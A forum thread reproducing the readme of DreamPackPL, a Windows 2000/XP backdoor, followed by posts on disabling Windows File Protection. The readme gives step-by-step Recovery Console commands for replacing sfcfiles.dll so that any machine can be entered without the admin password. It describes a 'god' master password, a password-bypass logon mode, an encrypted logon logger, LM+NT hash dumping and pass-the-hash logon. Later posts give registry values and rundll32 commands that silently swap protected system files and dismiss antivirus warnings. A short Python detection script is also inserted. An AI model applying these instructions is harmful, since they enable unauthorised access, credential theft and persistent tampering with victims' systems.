
How to fully disable System File Checker (SFC, WFP


Yurek3


DreamPackPL (version 2oo4.o6.1o)

Damian Bakowski

e-mail: d--b@wp.pl

web: www.d--b.webpark.pl

This tool is FREE for non-commercial usage.

THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND.

YOU USE THIS SOFTWARE ONLY AT YOUR OWN RISK.

REQUIREMENTS

------------

- Windows 2000, XP

- Windows installation CD

Note!

To get access to Windows XP, you can also use a CD from Windows 2000.

CONTENT

-------

- DreamPack.exe 87050 bytes

- sfcfiles.dll 39424 bytes

INSTALLATION

------------

1) Install

Installation on the current machine. You must have admin rights. After installation you must reboot the system.

2) Create CD

Create a new bootable CD with DreamPackPL from the original Windows installation CD. From this CD you can boot any machine with a 2000/XP system without knowing the admin password.

How to create a new Windows installation CD for DreamPackPL:

You can create this CD with the DreamPackPL program only in Windows 2000/XP.

DreamPackPL will need 400-600MB of free space to create the ISO image.

After the image file is created, you can burn it with any program.

* boot from CD

After booting from the CD, you must choose the system in the Recovery Console.

The console will accept any admin password.

You can change current directory

> cd system32

You should also make a backup of sfcfiles.dll

(backup file sfcfiles.lld will be used during uninstalling)

> ren sfcfiles.dll sfcfiles.lld

Then you must copy the file pinball.ex_ from the CD into the system32 directory, changing the file name to sfcfiles.dll

> copy x:\i386\pinball.ex_ sfcfiles.dll

(x - CD drive letter; the 'map' command displays all drive letters)

Finally, you can enter the 'exit' command and reboot the computer.

Note!

The whole time you use DreamPackPL, Windows File Protection will be disabled.

3) Extract

Extract file SFCFILES.DLL to selected path.

If you use other software to boot system or have FAT partition, then you can manually replace sfcfiles.dll on target system.

--

The configuration of DreamPackPL is stored in the registry in encrypted form and protected from deletion or change. During uninstallation this configuration is removed from the registry.

Log file created by Logon Logger is also encrypted.

COMMANDS DESCRIPTION

--------------------

Commands can be entered in edit-boxes "User Name" or "Password" in Winlogon window.

Commands are not case-sensitive. A command can have 1-15 characters.

Every command's character sequence can be changed.

Every command can be deactivated (except DreamOn).

Only DreamOn command is initially activated.

Command types:

--> DreamOn - default "dreamon"

Display DreamPackPL window at logon desktop.

--> PassOn - default "passon"

Turn on standard logon mode - user name and password are required.

--> PassOff - default "passoff"

Turn on logon mode without need to enter valid password. User will be logged on with wrong password and hash (LM+NT).

Entering this command in the "Password" edit-box will cause automatic password acceptance.

--> LogonLoggerOn - default "logonloggeron"

Turn on Logon Logger.

--> LogonLoggerOff - default "logonloggeroff"

Turn off Logon Logger.

--> DreamDesktop - default "dreamdesktop"

Create (and/or switch) new desktop for system account and load Explorer shell.

--> God-Password - default "god"

This command-password is a master password and will be always accepted.

The user will be logged on with a wrong password and wrong hash (LM+NT) independent of the current logon mode.

MENU DESCRIPTION

----------------

--> Passwords <--

-----> Normal checking

Standard logon mode - user name and password are required. [command PassOn]

-----> Logon with wrong password and hash

Logon mode without need to enter valid password. User will be logged on with wrong password and hash (LM+NT). [command PassOff]

-----> Logon with given hash

Standard logon mode, additionally with the possibility to enter a hash (LM+NT) - when the password is unknown, but the hash (LM+NT) is known. The user will be logged on with the given (wrong) password and given hash.

-----> Hash Calculator

Compute hash (LM+NT) from given password.

-----> Hash Audit

Display users list and hashes (LM+NT).

--> Accounts <--

-----> Windows accounts panel

Display standard system accounts edit window.

--> Logon Logger <--

-----> Use Logon Logger

Turn on/off Logon Logger (initially deactivated). [commands LogonLoggerOn, LogonLoggerOff]

-----> Log file view and settings

Display Logon Logger settings window.

-----> Delete file

Delete Logon Logger log file.

--> Execute <--

-----> Console

Execute Console

-----> Regedit

Execute Regedit

-----> Task Manager

Execute Task Manager

-----> Sysedit

Execute System Configuration Editor

-----> Notepad

Execute Notepad

-----> Calculator

Execute Calculator

-----> Explorer shell

Load Explorer shell

-----> Other...

Execute selected program.

--> Desktops <--

-----> Create (switch to) DreamPackPL desktop

Create (and/or switch) new desktop for system account and load Explorer shell. [command DreamDesktop]

--> Commands <--

-----> Commands settings

Display commands settings window

--> Uninstall DreamPackPL <--

Uninstall DreamPackPL.

UNINSTALLING

------------

There is no need to boot again from CD. Just select "Uninstall DreamPackPL" from menu and reboot system.

The old file sfcfiles.dll will be recovered from sfcfiles.lld (after reboot this backup file will be deleted). If the backup file does not exist, DreamPackPL will try to recover the file sfcfiles.dll from the system32/dllcache directory.

http://www.d--b.webpark.pl/reverse04_en.htm

http://www.d--b.webpark.pl/dreampackpl_en.htm

http://www.d--b.webpark.pl/reverse01_en.htm

Good luck



How to fully disable System File Checker (SFC, WFP).

The method of patching the sfc_os.dll (or sfc.dll) file doesn't fully disable WFP. Protected files can be replaced only manually. If any installer uses the MoveFileEx function (with the MOVEFILE_DELAY_UNTIL_REBOOT flag) to replace in-use protected files, then the files will not be replaced. The reason for this is that the session manager (smss.exe), while loading the system, checks the list of protected files before replacing any files. If a given file is in this list, then the replacement will fail. Until you add the AllowProtectedRenames value to the registry, the protected files will not be replaced.

The second often-used function is SetupInstallFile (with the SP_COPY_FORCE_IN_USE flag). Before adding a file to the replace-list, this function checks with SfcIsFileProtected (from sfc_os.dll) whether the file is protected or not. If the file sfc_os.dll is patched, then SfcIsFileProtected will always return false. So SetupInstallFile will not add the AllowProtectedRenames value to the registry.

I have developed my own method for fully disabling WFP. This method is simple, more flexible and doesn't need to patch any files. It is based on an empty list of protected files. So WFP is on, but the list of protected files is empty and all files are not protected. The list of protected files is in the file sfcfiles.dll. I have written my own sfcfiles.dll file with an empty list. The one thing to do is to replace this one file.

How to replace the sfcfiles.dll file?

This file is an in-use protected file. To replace it, you need to copy my sfcfiles0.dll into the system directory and add two values to this key:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager

After reboot, WFP will be fully disabled.

To add these two values to the registry you must have admin rights. And don't forget to make a backup of the old sfcfiles.dll.

1)

Value name: PendingFileRenameOperations

Value type: array of null-terminated strings (REG_MULTI_SZ)

Value data:

\??\c:\winnt\system32\sfcfiles0.dll

!\??\c:\winnt\system32\sfcfiles.dll

This value is used to replace files at reboot time.

The first line is the path to the file that should be moved. The second line is the new path for this file.

Note: Creating a value of REG_MULTI_SZ type in the registry editor is available from the XP version. To replace this file in Windows 2000, use the automatic installation described below.

2)

Value name: AllowProtectedRenames

Value type: DWORD (REG_DWORD)

Value data:

1

This value is needed to replace protected file.

And that is all.

Automatic installation mode for Windows 2000 users (also works in XP).

I have added two functions to the sfcfiles0.dll file: Install and Uninstall. These functions will add the two values to the registry. Before calling these functions, the file sfcfiles0.dll should be in the system directory.

Function: Install

Calling: Select a command "Execute..." from start menu (or in command prompt) and enter:

rundll32 sfcfiles0 Install

First, this function will make a backup of the old sfcfiles.dll file to the system32\dllcache directory, and add the two registry values. If the file sfcfiles.dll already exists in dllcache, then it will not be overwritten. After reboot the file sfcfiles0.dll will be renamed to sfcfiles.dll.

Function: Uninstall

Calling: Select a command "Execute..." from start menu (or in command prompt) and enter:

rundll32 sfcfiles Uninstall

This function copies the file sfcfiles.dll in dllcache to sfcfiles.tmp. This temporary file will be moved after reboot to the system32 directory. The file sfcfiles.dll (with the empty list) from the system directory will be copied to sfcfiles0.dll.

http://www.d--b.webpark.pl/reverse04_en.htm

Edited by Yurek3
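
From the defender's side, the two Session Manager values described in the post above are what to check on a machine suspected of having WFP disabled this way. The following Python is an added example, not part of the original post or of DreamPackPL: it parses the raw REG_MULTI_SZ data of PendingFileRenameOperations (as read from an offline hive export) and flags pending renames that land on the WFP files named in this thread. The function names and the sample bytes are constructed for illustration.

```python
import ntpath

# WFP components named in the thread; a pending rename onto one of them is the signal.
WFP_COMPONENTS = {"sfcfiles.dll", "sfc_os.dll", "sfc.dll"}

def strip_nt(path: str) -> str:
    r"""Drop the NT object-manager prefix \??\ so the path reads as a DOS path."""
    return path[4:] if path.startswith("\\??\\") else path

def parse_pending_renames(raw: bytes):
    """Decode REG_MULTI_SZ bytes into (source, destination, replace_existing) tuples.

    Strings come in pairs: source path, then destination path. An empty
    destination means "delete the source"; a leading '!' on the destination
    means an existing file is replaced.
    """
    strings = raw.decode("utf-16-le").split("\x00")
    ops = []
    for i in range(0, len(strings) - 1, 2):
        src, dst = strings[i], strings[i + 1]
        if not src:  # empty source: we have reached the list terminator
            break
        replace = dst.startswith("!")
        ops.append((strip_nt(src), strip_nt(dst.lstrip("!")), replace))
    return ops

def find_wfp_tampering(raw_pending: bytes, allow_protected_renames: int):
    """Return one finding per pending rename whose target is a WFP component."""
    findings = []
    for src, dst, replace in parse_pending_renames(raw_pending):
        if ntpath.basename(dst).lower() in WFP_COMPONENTS:
            findings.append({
                "source": src, "target": dst, "replace_existing": replace,
                # The post pairs the rename with AllowProtectedRenames = 1.
                "protected_renames_allowed": allow_protected_renames == 1,
            })
    return findings

# Constructed sample: the value data from the post plus one unrelated delete entry.
SAMPLE = ("\\??\\c:\\winnt\\system32\\sfcfiles0.dll\x00"
          "!\\??\\c:\\winnt\\system32\\sfcfiles.dll\x00"
          "\\??\\c:\\temp\\setup.tmp\x00\x00\x00").encode("utf-16-le")

if __name__ == "__main__":
    for finding in find_wfp_tampering(SAMPLE, allow_protected_renames=1):
        print(finding)
```

A finding with `protected_renames_allowed` set to true before the next reboot means the original sfcfiles.dll can still be preserved for comparison; after the reboot both values are consumed, so the file itself has to be checked against a known-good copy.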

It isn't a trojan. M$ doesn't like such files and he gave them trojan for antivirus campaigns

A trojan wants going outside in order to seize check-ups above this computer. This file isn't doing it.

He is only showing wasps, that niem of no files to protection.

Edited by Yurek3

The simplest way to disable SFC, WFP:-

****************************************

This file will completely disable SFC, WFP

without having any registry settings

and

also no tension of antivirus.... popups..

just replace original file with this one .. or u can simply place this in ur i386 folder.

enjoy....

SFC_OS.dll
